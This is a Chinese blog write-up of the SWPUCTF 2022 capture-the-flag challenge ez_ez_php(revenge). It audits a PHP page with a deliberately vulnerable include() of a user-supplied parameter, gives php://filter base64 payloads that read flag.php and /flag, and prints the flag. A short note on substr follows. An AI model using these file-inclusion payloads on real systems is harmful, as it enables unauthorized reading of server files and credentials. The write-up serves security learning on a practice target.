php伪协议 [SWPUCTF 2022 新生赛]ez_ez_php(revenge)

已于 2024-02-26 20:54:13 修改
阅读量841 收藏 11
点赞数 11
文章标签: php android android studio
于 2024-02-26 20:48:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75178803/article/details/136308086
版权

打开题目

题目源代码如下

 <?php
error_reporting(0);
if (isset($_GET['file'])) {
    if ( substr($_GET["file"], 0, 3) === "php" ) {
        echo "Nice!!!";
        include($_GET["file"]);
    } 

    else {
        echo "Hacker!!";
    }
}else {
    highlight_file(__FILE__);
}
//flag.php

代码审计一下

首先检查是否存在名为 file 的 GET 参数

如果存在 file 参数,就用substr函数检查该参数值的前三个字符是否为 "php"

  • 如果是的话,代码会输出 "Nice!!!",然后通过 include 函数包含该参数所指定的文件。
  • 如果不是以 "php" 开头,代码会输出 "Hacker!!"
  • 如果 file 参数不存在,则会显示当前文件的源代码。

很明显这里用php伪协议即可读取flag

payload

?file=php://filter/read=convert.base64-encode/resource=flag.php

解码得到

得到提示

把payload换成

?file=php://filter/read=convert.base64-encode/resource=/flag

解码即可得到flag

NSSCTF{7877cb1d-5672-4cc9-946a-d69f3c5d2640}

知识点:

subsub函数

substr(string,start<,length>)

主要功能是复制子字符串,要求从指定位置开始,并具有指定的长度

从string 的start位置开始提取字符串,length:待提取的字符串的长度

若length为以下情况时,返回整个字符串的所有字符

1、length不指定
2、length为空
3、length为负值
4、length大于字符串的长度

具体用法见:C++中substr()函数用法详解_substr c++-CSDN博客

访白鹿
关注
  • 11
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
dynablaster_revenge:爆破机复仇
05-31
Dynablaster Revenge是1991年由Hudson Soft发布的Dynablaster游戏的翻版。此翻版的目的是在保持某些原始玩法的同时尽可能增加原始功能,同时增加一些新功能,如联网多人游戏和实时3D渲染。 如果您还不熟悉最初的...
Revenge:创建私人的 1v1 复仇战
05-30
5. **通信协议** 使用PHP的HTTP或WebSocket库,可以实现实时的用户交互,比如推送通知、更新对战状态等。 6. **安全性与性能** - **防止SQL注入**:在处理用户输入时,必须确保使用预处理语句或参数化查询来避免...
[SWPUCTF 2022 新生]ez_ez_php
kuzemax的博客
08-18 669
根据代码分析,如果传递一个名为"file"的GET参数,并且以"php"开头的字符串作为值,那么将输出"Nice!函数获取"file"参数的前3个字符,并与字符串"php"进行比较。函数将"file"参数传递给PHP解析器,并包含/执行指定的文件。- 如果"file"参数不以"php"开头,则执行以下代码。- 这行代码检查是否存在一个名为"file"的GET参数。- 如果没有传递"file"参数,则执行以下代码。- 这行代码输出字符串"Hacker!- 这行代码输出字符串"Nice!
2022 SWPU新生&HNCTF web部分题目
weixin_63231007的博客
11-02 3204
SWPU在start.php 界面抓个包,发包得到:F1l1l1l1l1lag.phpThinkPHP V5 rce 漏洞在网上可以找到现成的payload替换whoami命令为我们要执行的命令即可反序列化构造 assert(eval($_POST[1]));cat /flag即可ez_1zpop之后把属性改大一位,绕过__wakeup()函数numgame查看js源码发现了NsScTf.php
NSSCTF-[SWPUCTF 2022]-web
J1ng_Hong的博客
11-14 630
ls发现根目录下有一个flag文件,然后用cat把他读取出来就行了。然后就得到了flag。
[SWPUCTF 2022]——Web方向 详细Writeup
Leaf_initial的博客
08-30 2999
打开环境得到源码然后base64解码得到flag。
FTP-Revenge.rar_Same Same
09-23
Same as the name, use for Ftp revenge
Zuma.zip_128 160java_full_zuma
09-20
在"Zuma.zip_128 160java_full_zuma"这个压缩包中,我们找到了适用于128x160像素屏幕大小的Java版本的Zuma游戏——"zumas_revenge_n6111_128x160_.jar"。这个版本的游戏针对的是早期功能手机或具有较低分辨率的设备...
medusas_revenge:美杜莎会在迷宫中找到自己的出路吗?
03-19
美杜莎的复仇–第一部分 这是我从大流行2年级开始的一个项目,它使我保持理智(或者根据自己的观点,使我更接近疯狂的边缘),并且只是为了好玩。 在其中,您扮演美杜莎(Medusa),希腊神话中的恶棍,在米诺斯...
NSSCTF刷题笔记web21——[SWPUCTF 2022 新生]ez_ez_php(revenge)
最新发布
qq_45692883的博客
01-26 252
php://filter/convert.base64-encode/resource=flag.php秒了。垂死争扎了一下,正确flag在/flag。看代码,file开头必须是php
[SWPUCTF 2022 新生]ez_rce
wyxlsm的博客
03-22 663
在写真不知道怎么下手 我去扫一下 后门文件 是有一些 tp5 的think php的漏洞 不说了 看下一步。这样我们看到flag 值 我们可以去访问他 得到flag。查看一下根目录下的flag 名字的文件。我们可以去访问他 得到。去利用漏洞利用的命令。
[FSCTF 2023]ez_php2 WP
SmillPig的博客
12-17 238
传参请求,拿到flag。
[FSCTF 2023]ez_php1已解决
XXokok的博客
10-24 546
[FSCTF 2023]ez_php1已解决
SWPUCTF 2022新生 web部分wp
weixin_44770698的博客
01-16 3775
SWPUCTF 2022新生
【SWPU NSS新生校外通道】web:奇妙的MD5、whereami、webdog1__start、ez_ez_phpez_ez_php(revenge)
weixin_46497491的博客
10-23 1240
【SWPU NSS新生校外通道】web:奇妙的MD5、whereami、webdog1__start、ez_ez_phpez_ez_php(revenge)
[SWPUCTF 2022 新生]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生]ez_rce
weixin_46497491的博客
11-07 3843
[SWPUCTF 2022 新生]ez_rce、[NSSRound#4 SWPU]ez_rce
[BJDCTF2020]EzPHP create_function()代码注入绕过$_REQUEST和QUERY_STRING等
a3320315的博客
01-29 3888
0x01 题目源码 <?php highlight_file(__FILE__); error_reporting(0); $file = "1nD3x.php"; $shana = $_GET['shana']; $passwd = $_GET['passwd']; $arg = ''; $code = ''; echo "<br /><font color=re...
CTF之旅WEB篇(3)--ezunser PHP反序列化
shutTD的博客
10-01 1305
总的来说这道题思路还是很清晰的,是算偏易的题了不过新手拿来练手还是可以的逻辑很清晰,建议看完这篇文章后自己再试着做一遍哦!
php代码审计 有哪些要点
02-23
PHP代码审计有以下几个要点: 1. 输入验证和过滤:要尽量防止输入的数据带来的安全风险,比如SQL注入、跨站脚本攻击等。 2. 输出编码:在向浏览器输出数据之前,要对特殊字符进行编码,防止出现 XSS 漏洞。 3. 权限管理:要严格控制用户的权限,避免普通用户操作有风险的功能。 4. 密码安全:存储密码时要使用哈希函数,并且尽量使用复杂的密码。 5. 错误处理:在开发过程中,要尽量避免程序出现未知错误,并在线上环境中给出友好的错误提示。 6. 安全配置:要注意 PHP 的配置文件中的安全设置,比如是否启用安全模式、是否关闭显示错误信息等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值